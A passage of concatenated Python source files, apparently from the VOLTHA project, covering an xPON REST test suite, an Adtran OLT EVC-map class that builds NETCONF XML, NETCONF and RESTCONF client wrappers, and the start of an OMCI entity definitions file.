# res = self.get('/#!/', expected_content_type='text/html')
# self.assertGreaterEqual(res.find('swagger'), 0)
def test_001_get_health(self):
res = self.get('/health')
self.assertEqual(res['state'], 'HEALTHY')
class TestXPon(RestBase):
base_url = BASE_URL
def test_002_setup_device(self):
global device
device = self.add_device()
self.verify_device_preprovisioned_state(device['id'])
self.activate_device(device['id'])
def _remove_device(self):
self.deactivate_device(device['id'])
self.delete_device(device['id'])
#~~~~~~~~~~~~~~~~~~~~~~ Helper Functions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Create a new simulated device
def add_device(self):
return self.post('/api/v1/devices',
MessageToDict(Device(
type=device_type,
host_and_port=host_and_port
)),
expected_http_code=200)
def verify_device_preprovisioned_state(self, olt_id):
# we also check that so far what we read back is same as what we get
# back on create
device = self.get('/api/v1/devices/{}'.format(olt_id))
self.assertNotEqual(device['id'], '')
self.assertEqual(device['adapter'], 'ponsim_olt')
self.assertEqual(device['admin_state'], 'PREPROVISIONED')
self.assertEqual(device['oper_status'], 'UNKNOWN')
# Active the simulated device.
# This will trigger the simulation of random alarms
def activate_device(self, device_id):
path = '/api/v1/devices/{}'.format(device_id)
self.post(path + '/enable', expected_http_code=200)
device = self.get(path)
self.assertEqual(device['admin_state'], 'ENABLED')
def deactivate_device(self, device_id):
path = '/api/v1/devices/{}'.format(device_id)
self.post(path + '/disable', expected_http_code=200)
device = self.get(path)
self.assertEqual(device['admin_state'], 'DISABLED')
def delete_device(self, device_id):
path = '/api/v1/devices/{}'.format(device_id)
self.delete(path + '/delete', expected_http_code=200)
device = self.get(path, expected_http_code=404)
self.assertIsNone(device)
# Add cg, cpair, cpart
def add(self, type, config, req, name):
res = self.verify(type)
prev_len = len(res[config])
self.post(self.get_path(type, name, ''),
MessageToDict(req, preserving_proto_field_name = True),
expected_http_code = 200)
return self.verify(type), prev_len
# Modify the existing cg, cpair, cpart
def modify(self, type, req, name):
self.post(self.get_path(type, name, '/modify'),
MessageToDict(req, preserving_proto_field_name = True),
expected_http_code = 200)
return self.verify(type)
# Delete cg, cpair, cpart
def remove(self, type, config, name):
res = self.verify(type)
prev_len = len(res[config])
self.delete(self.get_path(type, name, '/delete'),
expected_http_code = 200)
return self.verify(type), prev_len
# Retrieve the desired item upon Post message
def verify(self, type):
if(type == 'channel_terminations'):
return self.get('/api/v1/devices/{}/{}'.format(device['id'], type))
return self.get('/api/v1/{}'.format(type))
def get_path(self, type, name, operation):
if(type == 'channel_terminations'):
return '/api/v1/devices/{}/{}/{}{}'.format(device['id'],
type, name, operation)
return '/api/v1/{}/{}{}'.format(type, name, operation)
# Method to check if the result is same as the change requested
def search(self, req, result):
dict1 = MessageToDict(req,
including_default_value_fields = True,
preserving_proto_field_name = True)
#skip comparison of READ-ONLY fields
result['id'] = ''
if isinstance(req, fb.ChannelgroupConfig):
result['cg_index'] = 0
elif isinstance(req, tcont.TcontsConfigData):
result['alloc_id'] = 0
elif isinstance(req, gemport.GemportsConfigData):
result['gemport_id'] = 0
return dict1 == result
#~~~~~~~~~~~~~~ Function to create test cases on the fly ~~~~~~~~~~~~~~~~
def create_dynamic_method(key, value):
obj_type_config = {
'cg': {'type':'channel_groups',
'config':'channelgroup_config'},
'cpart': {'type':'channel_partitions',
'config':'channelpartition_config'},
'cpair': {'type':'channel_pairs',
'config':'channelpair_config'},
'cterm': {'type':'channel_terminations',
'config':'channeltermination_config'},
'vontani':{'type':'v_ont_anis',
'config':'v_ontani_config'},
'ontani': {'type':'ont_anis',
'config':'ontani_config'},
'venet': {'type':'v_enets',
'config':'v_enet_config'},
'gemport':{'type':'gemports',
'config':'gemports_config'},
'tcont': {'type':'tconts',
'config':'tconts_config'},
'tdp': {'type':'traffic_descriptor_profiles',
'config':'traffic_descriptor_profiles'}
}
def _add(self, type, config, req, name):
result, prev_len = self.add(type, config, req, name)
self.assertEqual(result[config][prev_len]['name'], name)
self.assertEqual(len(result[config]), prev_len+1)
self.assertEqual(self.search(req, result[config][0]), True)
def _mod(self, type, config, req, name):
result = self.modify(type, req, name)
self.assertEqual(self.search(req, result[config][0]), True)
def _del(self, type, config, req, name):
result, prev_len = self.remove(type, config, name)
self.assertEqual(len(result[config]), prev_len-1)
def _operate(self, obj_action, type_config, req, name):
if obj_action == 'add':
_add(self, type_config['type'], type_config['config'], req, name)
elif obj_action == 'mod':
_mod(self, type_config['type'], type_config['config'], req, name)
elif obj_action == 'del':
_del(self, type_config['type'], type_config['config'], req, name)
def _config(self):
ParseDict(value['rpc'], value['pb2'])
return value['pb2']
def dynamic_test_method(self):
_obj_action = [val for val in key.split('-')]
_type_config = obj_type_config[_obj_action[0]]
_req = _config(self)
_operate(self, _obj_action[1], _type_config, _req, value['rpc']['name'])
return dynamic_test_method
#read the set instructions for tests
#dynamically create test cases in desired sequence
for item in scenario:
id = id + 1
if(isinstance(item, dict)):
for k,v in item.items():
dynamic_method = create_dynamic_method(k, v)
dynamic_method.__name__ = 'test_{:3d}_{}'.format(id, k).replace(
' ', '0')
setattr(TestXPon, dynamic_method.__name__, dynamic_method)
del dynamic_method
if __name__ == '__main__':
unittest.main()
```
#### File: adtran_olt/flow/evc_map.py
```python
import xmltodict
import re
import structlog
from enum import Enum
from twisted.internet.defer import inlineCallbacks, returnValue, succeed
log = structlog.get_logger()
# NOTE: For the EVC Map name, the ingress-port number is the VOLTHA port number (not pon-id since
# it covers NNI ports as well in order to handle the NNI-NNI case. For flows that
# cover an entire pon, the name will have the ONU ID and GEM ID appended to it upon
# installation with a period as a separator.
EVC_MAP_NAME_FORMAT = 'VOLTHA-{}-{}' # format(ingress-port, flow.id)
EVC_MAP_NAME_REGEX_ALL = 'VOLTHA-*'
class EVCMap(object):
"""
Class to wrap EVC functionality
"""
class EvcConnection(Enum):
NO_EVC_CONNECTION = 0
EVC = 1
DISCARD = 2
DEFAULT = NO_EVC_CONNECTION
@staticmethod
def xml(value):
# Note we do not have XML for 'EVC' enumeration.
if value is None:
value = EVCMap.EvcConnection.DEFAULT
if value == EVCMap.EvcConnection.DISCARD:
return '<no-evc-connection/>'
elif value == EVCMap.EvcConnection.DISCARD:
return 'discard/'
raise ValueError('Invalid EvcConnection enumeration')
class PriorityOption(Enum):
INHERIT_PRIORITY = 0
EXPLICIT_PRIORITY = 1
DEFAULT = INHERIT_PRIORITY
@staticmethod
def xml(value):
if value is None:
value = EVCMap.PriorityOption.DEFAULT
if value == EVCMap.PriorityOption.INHERIT_PRIORITY:
return '<inherit-pri/>'
elif value == EVCMap.PriorityOption.EXPLICIT_PRIORITY:
return '<explicit-pri/>'
raise ValueError('Invalid PriorityOption enumeration')
def __init__(self, flow, evc, is_ingress_map):
self._flow = flow
self._evc = evc
self._gem_ids_and_vid = None # { key -> onu-id, value -> tuple(sorted GEM Port IDs, onu_vid) }
self._is_ingress_map = is_ingress_map
self._pon_id = None
self._installed = False
self._status_message = None
self._name = None
self._enabled = True
self._uni_port = None
self._evc_connection = EVCMap.EvcConnection.DEFAULT
self._evc_name = None
self._men_priority = EVCMap.PriorityOption.DEFAULT
self._men_pri = 0 # If Explicit Priority
self._c_tag = None
self._men_ctag_priority = EVCMap.PriorityOption.DEFAULT
self._men_ctag_pri = 0 # If Explicit Priority
self._match_ce_vlan_id = None
self._match_untagged = False
self._match_destination_mac_address = None
self._match_l2cp = False
self._match_broadcast = False
self._match_multicast = False
self._match_unicast = False
self._match_igmp = False
# ACL logic
self._eth_type = None
self._ip_protocol = None
self._ipv4_dst = None
self._udp_dst = None
self._udp_src = None
try:
self._valid = self._decode()
except Exception as e:
log.exception('decode', e=e)
self._valid = False
if self._valid:
evc.add_evc_map(self)
else:
self._evc = None
def __str__(self):
return "EVCMap-{}: UNI: {}, isACL: {}".format(self._name, self._uni_port,
self._needs_acl_support)
@staticmethod
def create_ingress_map(flow, evc):
return EVCMap(flow, evc, True)
@staticmethod
def create_egress_map(flow, evc):
return EVCMap(flow, evc, False)
@property
def valid(self):
return self._valid
@property
def installed(self):
return self._installed
@installed.setter
def installed(self, value):
assert not value, 'installed can only be reset' # Can only reset
self._installed = False
@property
def name(self):
return self._name
@property
def status(self):
return self._status_message
@status.setter
def status(self, value):
self._status_message = value
@property
def evc(self):
return self._evc
@property
def _needs_acl_support(self):
if self._ipv4_dst is not None: # In case MCAST downstream has ACL on it
return False
return self._eth_type is not None or self._ip_protocol is not None or\
self._udp_dst is not None or self._udp_src is not None
@property
def pon_id(self):
return self._pon_id # May be None
@property
def onu_ids(self):
return self._gem_ids_and_vid.keys()
@property
def gem_ids_and_vid(self):
return self._gem_ids_and_vid.copy()
@staticmethod
def _xml_header(operation=None):
return '<evc-maps xmlns="http://www.adtran.com/ns/yang/adtran-evc-maps"{}><evc-map>'.\
format('' if operation is None else ' xc:operation="{}"'.format(operation))
@staticmethod
def _xml_trailer():
return '</evc-map></evc-maps>'
def _common_install_xml(self):
xml = '<enabled>{}</enabled>'.format('true' if self._enabled else 'false')
xml += '<uni>{}</uni>'.format(self._uni_port)
if self._evc_name is not None:
xml += '<evc>{}</evc>'.format(self._evc_name)
else:
xml += EVCMap.EvcConnection.xml(self._evc_connection)
xml += '<match-untagged>{}</match-untagged>'.format('true'
if self._match_untagged
else 'false')
# if self._c_tag is not None:
# xml += '<ctag>{}</ctag>'.format(self._c_tag)
# TODO: The following is not yet supported (and in some cases, not decoded)
# self._men_priority = EVCMap.PriorityOption.INHERIT_PRIORITY
# self._men_pri = 0 # If Explicit Priority
#
# self._men_ctag_priority = EVCMap.PriorityOption.INHERIT_PRIORITY
# self._men_ctag_pri = 0 # If Explicit Priority
#
# self._match_ce_vlan_id = None
# self._match_untagged = True
# self._match_destination_mac_address = None
# self._eth_type = None
# self._ip_protocol = None
# self._ipv4_dst = None
# self._udp_dst = None
# self._udp_src = None
return xml
def _ingress_install_xml(self, onu_s_gem_ids_and_vid):
from ..onu import Onu
xml = '<evc-maps xmlns="http://www.adtran.com/ns/yang/adtran-evc-maps">'
for onu_or_vlan_id, gem_ids_and_vid in onu_s_gem_ids_and_vid.iteritems():
first_gem_id = True
vid = gem_ids_and_vid[1]
ident = '{}.{}'.format(self._pon_id, onu_or_vlan_id) if vid is None \
else onu_or_vlan_id
for gem_id in gem_ids_and_vid[0]:
xml += '<evc-map>'
xml += '<name>{}.{}.{}</name>'.format(self.name, ident, gem_id)
xml += '<ce-vlan-id>{}</ce-vlan-id>'.format(Onu.gem_id_to_gvid(gem_id))
# GEM-IDs are a sorted list (ascending). First gemport handles downstream traffic
if first_gem_id and vid is not None:
first_gem_id = False
xml += '<network-ingress-filter>'
xml += '<men-ctag>{}</men-ctag>'.format(vid) # Added in August 2017 model
xml += '</network-ingress-filter>'
xml += self._common_install_xml()
xml += '</evc-map>'
xml += '</evc-maps>'
return xml
def _egress_install_xml(self):
xml = EVCMap._xml_header()
xml += '<name>{}</name>'.format(self.name)
xml += self._common_install_xml()
xml += EVCMap._xml_trailer()
return xml
@inlineCallbacks
def install(self):
def gem_ports():
ports = []
for gems_and_vids in self._gem_ids_and_vid.itervalues():
ports.extend(gems_and_vids[0])
return ports
if self._valid and not self._installed and len(gem_ports()) > 0:
try:
# TODO: create generator of XML once we have MANY to install at once
map_xml = self._ingress_install_xml(self._gem_ids_and_vid) \
if self._is_ingress_map else self._egress_install_xml()
log.debug('install', xml=map_xml, name=self.name)
results = yield self._flow.handler.netconf_client.edit_config(map_xml)
self._installed = results.ok
self.status = '' if results.ok else results.error
except Exception as e:
log.exception('install', name=self.name, e=e)
raise
returnValue(self._installed and self._valid)
def _ingress_remove_xml(self, onus_gem_ids_and_vid):
xml = '<evc-maps xmlns="http://www.adtran.com/ns/yang/adtran-evc-maps"' + \
' xc:operation="delete">'
for onu_id, gem_ids_and_vid in onus_gem_ids_and_vid.iteritems():
for gem_id in gem_ids_and_vid[0]:
xml += '<evc-map>'
xml += '<name>{}.{}.{}</name>'.format(self.name, onu_id, gem_id)
xml += '</evc-map>'
xml += '</evc-maps>'
return xml
def _egress_remove_xml(self):
return EVCMap._xml_header('delete') + \
'<name>{}</name>'.format(self.name) + EVCMap._xml_trailer()
def remove(self):
if not self.installed:
returnValue('Not installed')
log.info('removing', evc_map=self)
def _success(rpc_reply):
log.debug('remove-success', rpc_reply=rpc_reply)
self._installed = False
def _failure(failure):
log.error('remove-failed', failure=failure)
self._installed = False
# TODO: create generator of XML once we have MANY to install at once
map_xml = self._ingress_remove_xml(self._gem_ids_and_vid) if self._is_ingress_map \
else self._egress_remove_xml()
d = self._flow.handler.netconf_client.edit_config(map_xml)
d.addCallbacks(_success, _failure)
return d
@inlineCallbacks
def delete(self):
"""
Remove from hardware and delete/clean-up EVC-MAP Object
"""
if self._evc is not None:
self._evc.remove_evc_map(self)
self._evc = None
self._flow = None
self._valid = False
try:
yield self.remove()
except Exception as e:
log.exception('removal', e=e)
returnValue('Done')
def reflow_needed(self):
log.debug('reflow-needed')
reflow = not self.installed
# TODO: implement
return reflow
@staticmethod
def create_evc_map_name(flow):
return EVC_MAP_NAME_FORMAT.format(flow.in_port, flow.flow_id)
def add_gem_port(self, gem_port, reflow=False):
# TODO: Refactor
if self._is_ingress_map:
def gem_ports():
ports = []
for gems_and_vids in self._gem_ids_and_vid.itervalues():
ports.extend(gems_and_vids[0])
return ports
before = gem_ports()
self._setup_gem_ids()
after = gem_ports()
if reflow or len(before) < len(after):
self._installed = False
return self.install()
return succeed('nop')
def remove_gem_port(self, gem_port):
# TODO: Refactor
if self._is_ingress_map:
def gem_ports():
ports = []
for gems_and_vids in self._gem_ids_and_vid.itervalues():
ports.extend(gems_and_vids[0])
return ports
before = gem_ports()
self._setup_gem_ids()
after = gem_ports()
if len(before) > len(after):
if len(after) == 0:
return self.remove()
else:
self._installed = False
return self.install()
return succeed('nop')
# self._gem_ids_and_vid = None # { key -> onu-id, value -> tuple(sorted GEM Port IDs, onu_vid) }
def _setup_gem_ids(self):
from flow_entry import FlowEntry
flow = self._flow # TODO: Drop saving of flow once debug complete
is_pon = flow.handler.is_pon_port(flow.in_port)
if self._is_ingress_map and is_pon:
pon_port = flow.handler.get_southbound_port(flow.in_port)
if pon_port is not None:
self._pon_id = pon_port.pon_id
self._gem_ids_and_vid = pon_port.gem_ids(flow.logical_port,
self._needs_acl_support,
flow.is_multicast_flow)
# TODO: Only EAPOL ACL support for the first demo - FIXED_ONU
if self._needs_acl_support and self._eth_type != FlowEntry.EtherType.EAPOL.value:
self._gem_ids_and_vid = dict()
def _decode(self):
from evc import EVC
from flow_entry import FlowEntry
flow = self._flow # TODO: Drop saving of flow once debug complete
self._name = EVCMap.create_evc_map_name(flow)
if self._evc:
self._evc_connection = EVCMap.EvcConnection.EVC
self._evc_name = self._evc.name
else:
self._status_message = 'Can only create EVC-MAP if EVC supplied'
return False
is_pon = flow.handler.is_pon_port(flow.in_port)
is_uni = flow.handler.is_uni_port(flow.in_port)
if is_pon or is_uni:
self._uni_port = flow.handler.get_port_name(flow.in_port)
self._evc.ce_vlan_preservation = False
else:
self._status_message = 'EVC-MAPS without UNI or PON ports are not supported'
return False # UNI Ports handled in the EVC Maps
# ACL logic
self._eth_type = flow.eth_type
if self._eth_type == FlowEntry.EtherType.IPv4.value:
self._ip_protocol = flow.ip_protocol
self._ipv4_dst = flow.ipv4_dst
if self._ip_protocol == FlowEntry.IpProtocol.UDP.value:
self._udp_dst = flow.udp_dst
self._udp_src = flow.udp_src
# If no match of VLAN this may be for untagged traffic or upstream and needs to
# match the gem-port vid
self._setup_gem_ids()
# self._match_untagged = flow.vlan_id is None and flow.inner_vid is None
self._c_tag = flow.inner_vid
# If a push of a single VLAN is present with a POP of the VLAN in the EVC's
# flow, then this is a traditional EVC flow
self._evc.men_to_uni_tag_manipulation = EVC.Men2UniManipulation.POP_OUT_TAG_ONLY
self._evc.switching_method = EVC.SwitchingMethod.DOUBLE_TAGGED
# if len(flow.push_vlan_id) == 1 and self._evc.flow_entry.pop_vlan == 1:
# self._evc.men_to_uni_tag_manipulation = EVC.Men2UniManipulation.SYMMETRIC
# self._evc.switching_method = EVC.SwitchingMethod.SINGLE_TAGGED
# self._evc.stpid = flow.push_vlan_tpid[0]
#
# elif len(flow.push_vlan_id) == 2 and self._evc.flow_entry.pop_vlan == 1:
# self._evc.men_to_uni_tag_manipulation = EVC.Men2UniManipulation.POP_OUT_TAG_ONLY
# self._evc.switching_method = EVC.SwitchingMethod.DOUBLE_TAGGED
# # self._match_ce_vlan_id = 'something maybe'
# raise NotImplementedError('TODO: Not supported/needed yet')
return True
# Bulk operations
@staticmethod
def remove_all(client, regex_=EVC_MAP_NAME_REGEX_ALL):
"""
Remove all matching EVC Maps from hardware
:param client: (ncclient) NETCONF Client to use
:param regex_: (String) Regular expression for name matching
:return: (deferred)
"""
# Do a 'get' on the evc-map config an you should get the names
get_xml = """
<filter>
<evc-maps xmlns="http://www.adtran.com/ns/yang/adtran-evc-maps">
<evc-map>
<name/>
</evc-map>
</evc-maps>
</filter>
"""
log.info('query', xml=get_xml, regex=regex_)
def request_failed(results, operation):
log.error('{}-failed'.format(operation), results=results)
# No further actions. Periodic poll later on will scrub any old EVC-Maps if needed
def delete_complete(results):
log.debug('delete-complete', results=results)
def do_delete(rpc_reply, regexpr):
log.debug('query-complete', rpc_reply=rpc_reply)
if rpc_reply.ok:
result_dict = xmltodict.parse(rpc_reply.data_xml)
entries = result_dict['data']['evc-maps'] if 'evc-maps' in result_dict['data'] else {}
if 'evc-map' in entries:
p = re.compile(regexpr)
if isinstance(entries['evc-map'], list):
names = {entry['name'] for entry in entries['evc-map']
if 'name' in entry and p.match(entry['name'])}
else:
names = set()
for item in entries['evc-map'].items():
if isinstance(item, tuple) and item[0] == 'name':
names.add(item[1])
break
if len(names) > 0:
del_xml = '<evc-maps xmlns="http://www.adtran.com/ns/yang/adtran-evc-maps"' + \
' xc:operation = "delete">'
for name in names:
del_xml += '<evc-map>'
del_xml += '<name>{}</name>'.format(name)
del_xml += '</evc-map>'
del_xml += '</evc-maps>'
log.debug('removing', xml=del_xml)
return client.edit_config(del_xml)
return succeed('no entries')
d = client.get(get_xml)
d.addCallbacks(do_delete, request_failed, callbackArgs=[regex_], errbackArgs=['get'])
d.addCallbacks(delete_complete, request_failed, errbackArgs=['edit-config'])
return d
```
#### File: adtran_olt/net/adtran_netconf.py
```python
import structlog
from lxml import etree
from ncclient import manager
from ncclient.operations import RPCError
from ncclient.transport.errors import SSHError
from twisted.internet import defer, threads
from twisted.internet.defer import inlineCallbacks, returnValue
log = structlog.get_logger('ncclient')
ADTRAN_NS = 'http://www.adtran.com/ns/yang'
def adtran_module_url(module):
return '{}/{}'.format(ADTRAN_NS, module)
def phys_entities_rpc():
return """
<filter xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<physical-entities-state xmlns="{}">
<physical-entity/>
</physical-entities-state>
</filter>
""".format(adtran_module_url('adtran-physical-entities'))
class AdtranNetconfClient(object):
"""
Performs NETCONF requests
"""
def __init__(self, host_ip, port=830, username='', password='', timeout=10):
self._ip = host_ip
self._port = port
self._username = username
self._password = password
self._timeout = timeout
self._session = None
def __str__(self):
return "AdtranNetconfClient {}@{}:{}".format(self._username, self._ip, self._port)
@property
def capabilities(self):
"""
Get the server's NETCONF capabilities
:return: (ncclient.capabilities.Capabilities) object representing the server's capabilities.
"""
return self._session.server_capabilities if self._session else None
@property
def connected(self):
"""
Is this client connected to a NETCONF server
:return: (boolean) True if connected
"""
return self._session is not None and self._session.connected
def connect(self, connect_timeout=None):
"""
Connect to the NETCONF server
o To disable attempting publickey authentication altogether, call with
allow_agent and look_for_keys as False.
o hostkey_verify enables hostkey verification from ~/.ssh/known_hosts
:return: (deferred) Deferred request
"""
timeout = connect_timeout or self._timeout
return threads.deferToThread(self._do_connect, timeout)
def _do_connect(self, timeout):
try:
self._session = manager.connect(host=self._ip,
port=self._port,
username=self._username,
password=<PASSWORD>,
allow_agent=False,
look_for_keys=False,
hostkey_verify=False,
timeout=timeout)
except SSHError as e:
# Log and rethrow exception so any errBack is called
log.exception('SSHError-during-connect', e=e)
raise e
except Exception as e:
# Log and rethrow exception so any errBack is called
log.exception('Connect-failed: {}', e=e)
raise e
# If debug logging is enabled, decrease the level, DEBUG is a significant
# performance hit during response XML decode
if log.isEnabledFor('DEBUG'):
log.setLevel('INFO')
# TODO: ncclient also supports RaiseMode:NONE to limit exceptions. To set use:
#
# self._session.raise_mode = RaiseMode:NONE
#
# and the when you get a response back, you can check 'response.ok' to see if it is 'True'
# if it is not, you can enumerate the 'response.errors' list for more information
return self._session
def close(self):
"""
Close the connection to the NETCONF server
:return: (deferred) Deferred request
"""
s, self._session = self._session, None
if s is None or not s.connected:
return defer.returnValue(True)
return threads.deferToThread(self._do_close, s)
def _do_close(self, old_session):
return old_session.close_session()
@inlineCallbacks
def _reconnect(self):
try:
yield self.close()
except:
pass
try:
yield self.connect()
except:
pass
def get_config(self, source='running'):
"""
Get the configuration from the specified source
:param source: (string) Configuration source, 'running', 'candidate', ...
:return: (deferred) Deferred request that wraps the GetReply class
"""
if not self._session:
raise NotImplemented('No SSH Session')
if not self._session.connected:
self._reconnect()
return threads.deferToThread(self._do_get_config, source)
def _do_get_config(self, source):
"""
Get the configuration from the specified source
:param source: (string) Configuration source, 'running', 'candidate', ...
:return: (GetReply) The configuration.
"""
return self._session.get_config(source)
def get(self, payload):
"""
Get the requested data from the server
:param payload: Payload/filter
:return: (deferred) for GetReply
"""
log.debug('get', filter=payload)
if not self._session:
raise NotImplemented('No SSH Session')
if not self._session.connected:
self._reconnect()
return threads.deferToThread(self._do_get, payload)
def _do_get(self, payload):
"""
Get the requested data from the server
:param payload: Payload/filter
:return: (GetReply) response
"""
try:
log.debug('get', payload=payload)
response = self._session.get(payload)
# To get XML, use response.xml
log.debug('response', response=response)
except RPCError as e:
log.exception('get', e=e)
raise
return response
def lock(self, source, lock_timeout):
"""
Lock the configuration system
:return: (deferred) for RpcReply
"""
log.info('lock', source=source, timeout=lock_timeout)
if not self._session or not self._session.connected:
raise NotImplemented('TODO: Support auto-connect if needed')
return threads.deferToThread(self._do_lock, source, lock_timeout)
def _do_lock(self, source, lock_timeout):
"""
Lock the configuration system
"""
try:
response = self._session.lock(source, timeout=lock_timeout)
# To get XML, use response.xml
except RPCError as e:
log.exception('lock', e=e)
raise
return response
def unlock(self, source):
"""
Get the requested data from the server
:param rpc_string: RPC request
:return: (deferred) for RpcReply
"""
log.info('unlock', source=source)
if not self._session or not self._session.connected:
raise NotImplemented('TODO: Support auto-connect if needed')
return threads.deferToThread(self._do_unlock, source)
def _do_unlock(self, source):
"""
Lock the configuration system
"""
try:
response = self._session.unlock(source)
# To get XML, use response.xml
except RPCError as e:
log.exception('unlock', e=e)
raise
return response
@inlineCallbacks
def edit_config(self, config, target='running', default_operation='none',
test_option=None, error_option=None):
"""
Loads all or part of the specified config to the target configuration datastore with the ability to lock
the datastore during the edit.
:param config is the configuration, which must be rooted in the config element. It can be specified
either as a string or an Element.format="xml"
:param target is the name of the configuration datastore being edited
:param default_operation if specified must be one of { 'merge', 'replace', or 'none' }
:param test_option if specified must be one of { 'test_then_set', 'set' }
:param error_option if specified must be one of { 'stop-on-error', 'continue-on-error', 'rollback-on-error' }
The 'rollback-on-error' error_option depends on the :rollback-on-error capability.
:return: (deferred) for RpcReply
"""
if not self._session:
raise NotImplemented('No SSH Session')
if not self._session.connected:
try:
yield self._reconnect()
except Exception as e:
log.exception('edit-config-connect', e=e)
try:
if config[:7] != '<config':
config = '<config xmlns:xc="urn:ietf:params:xml:ns:netconf:base:1.0"' + \
' xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">' + \
config + '</config>'
rpc_reply = yield threads.deferToThread(self._do_edit_config, target,
config, default_operation,
test_option, error_option)
except Exception as e:
log.exception('edit_config', e=e)
raise
returnValue(rpc_reply)
def _do_edit_config(self, target, config, default_operation, test_option, error_option):
"""
Lock the configuration system
"""
try:
log.debug('edit-config', target=target, config=config)
response = self._session.edit_config(target=target, config=config
# TODO: Support additional options later
# ,default_operation=default_operation,
# test_option=test_option,
# error_option=error_option
)
log.debug('response', response=response)
# To get XML, use response.xml
# To check status, use response.ok (boolean)
except RPCError as e:
log.exception('do_edit_config', e=e)
raise
return response
def rpc(self, rpc_string):
"""
Custom RPC request
:param rpc_string: (string) RPC request
:return: (deferred) for GetReply
"""
log.debug('rpc', rpc=rpc_string)
if not self._session:
raise NotImplemented('No SSH Session')
if not self._session.connected:
self._reconnect()
return threads.deferToThread(self._do_rpc, rpc_string)
def _do_rpc(self, rpc_string):
try:
response = self._session.dispatch(etree.fromstring(rpc_string))
# To get XML, use response.xml
except RPCError as e:
log.exception('rpc', e=e)
raise
return response
```
#### File: adtran_olt/net/adtran_rest.py
```python
import json
import structlog
import treq
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.internet.error import ConnectionClosed, ConnectionDone, ConnectionLost
log = structlog.get_logger()
class RestInvalidResponseCode(Exception):
def __init__(self, message, url, code):
super(RestInvalidResponseCode, self).__init__(message)
self.url = url
self.code = code
class AdtranRestClient(object):
"""
Performs Adtran RESTCONF requests
"""
# HTTP shortcuts
HELLO_URI = '/restconf/adtran-hello:hello'
REST_GET_REQUEST_HEADER = {'User-Agent': 'Adtran RESTConf',
'Accept': ['application/json']}
REST_POST_REQUEST_HEADER = {'User-Agent': 'Adtran RESTConf',
'Content-Type': 'application/json',
'Accept': ['application/json']}
REST_PATCH_REQUEST_HEADER = REST_POST_REQUEST_HEADER
REST_PUT_REQUEST_HEADER = REST_POST_REQUEST_HEADER
REST_DELETE_REQUEST_HEADER = REST_GET_REQUEST_HEADER
HTTP_OK = 200
HTTP_CREATED = 201
HTTP_ACCEPTED = 202
HTTP_NON_AUTHORITATIVE_INFORMATION = 203
HTTP_NO_CONTENT = 204
HTTP_RESET_CONTENT = 205
HTTP_PARTIAL_CONTENT = 206
_valid_methods = {'GET', 'POST', 'PATCH', 'DELETE'}
_valid_results = {'GET': [HTTP_OK, HTTP_NO_CONTENT],
'POST': [HTTP_OK, HTTP_CREATED, HTTP_NO_CONTENT],
'PUT': [HTTP_OK, HTTP_CREATED, HTTP_NO_CONTENT],
'PATCH': [HTTP_OK],
'DELETE': [HTTP_OK, HTTP_ACCEPTED, HTTP_NO_CONTENT]
}
for _method in _valid_methods:
assert _method in _valid_results # Make sure we have a results entry for each supported method
def __init__(self, host_ip, port, username='', password='', timeout=10):
"""
REST Client initialization
:param host_ip: (string) IP Address of Adtran Device
:param port: (int) Port number
:param username: (string) Username for credentials
:param password: (string) Password for credentials
:param timeout: (int) Number of seconds to wait for a response before timing out
"""
self._ip = host_ip
self._port = port
self._username = username
self._password = password
self._timeout = timeout
def __str__(self):
return "AdtranRestClient {}@{}:{}".format(self._username, self._ip, self._port)
@inlineCallbacks
def request(self, method, uri, data=None, name='', timeout=None, is_retry=False,
suppress_error=False):
"""
Send a REST request to the Adtran device
:param method: (string) HTTP method
:param uri: (string) fully URL to perform method on
:param data: (string) optional data for the request body
:param name: (string) optional name of the request, useful for logging purposes
:param timeout: (int) Number of seconds to wait for a response before timing out
:param is_retry: (boolean) True if this method called recursively in order to recover
from a connection loss. Can happen sometimes in debug sessions
and in the real world.
:return: (dict) On success with the proper results
"""
log.debug('request', method=method, uri=uri, data=data, retry=is_retry)
if method.upper() not in self._valid_methods:
raise NotImplementedError("REST method '{}' is not supported".format(method))
url = 'http://{}:{}{}{}'.format(self._ip, self._port,
'/' if uri[0] != '/' else '',
uri)
response = None
timeout = timeout or self._timeout
try:
if method.upper() == 'GET':
response = yield treq.get(url,
auth=(self._username, self._password),
timeout=timeout,
headers=self.REST_GET_REQUEST_HEADER)
elif method.upper() == 'POST' or method.upper() == 'PUT':
response = yield treq.post(url,
data=data,
auth=(self._username, self._password),
timeout=timeout,
headers=self.REST_POST_REQUEST_HEADER)
elif method.upper() == 'PATCH':
response = yield treq.patch(url,
data=data,
auth=(self._username, self._password),
timeout=timeout,
headers=self.REST_PATCH_REQUEST_HEADER)
elif method.upper() == 'DELETE':
response = yield treq.delete(url,
auth=(self._username, self._password),
timeout=timeout,
headers=self.REST_DELETE_REQUEST_HEADER)
else:
raise NotImplementedError("REST method '{}' is not supported".format(method))
except NotImplementedError:
raise
except (ConnectionDone, ConnectionLost) as e:
if is_retry:
raise
returnValue(self.request(method, uri, data=data, name=name,
timeout=timeout, is_retry=True))
except ConnectionClosed:
returnValue(ConnectionClosed)
except Exception as e:
log.exception("rest-request", method=method, url=url, name=name, e=e)
raise
if response.code not in self._valid_results[method.upper()]:
message = "REST {} '{}' request to '{}' failed with status code {}".format(method, name,
url, response.code)
if not suppress_error:
log.error(message)
raise RestInvalidResponseCode(message, url, response.code)
if response.code == self.HTTP_NO_CONTENT:
returnValue(None)
else:
# TODO: May want to support multiple body encodings in the future
headers = response.headers
type_key = 'content-type'
type_val = 'application/json'
if not headers.hasHeader(type_key) or type_val not in headers.getRawHeaders(type_key, []):
raise Exception("REST {} '{}' request response from '{}' was not JSON",
method, name, url)
content = yield response.content()
try:
result = json.loads(content)
except Exception as e:
log.exception("json-decode", method=method, url=url, name=name,
content=content, e=e)
raise
returnValue(result)
```
#### File: adtran_onu/omci/omci_entities.py
```python
import inspect
import sys
from scapy.fields import ByteField, ShortField
from scapy.fields import IntField, StrFixedLenField
from voltha.extensions.omci.omci_entities import EntityClassAttribute, \
AttributeAccess, EntityOperations, EntityClass
# abbreviations
ECA = EntityClassAttribute
AA = AttributeAccess
OP = EntityOperations
class OntSystem(EntityClass):
class_id = 65300
attributes = [
ECA(ShortField("managed_entity_id", None), {AA.R, AA.SBC}),
]
mandatory_operations = {OP.Get}
class VerizonOpenOMCI(EntityClass):
class_id = 65400
attributes = [
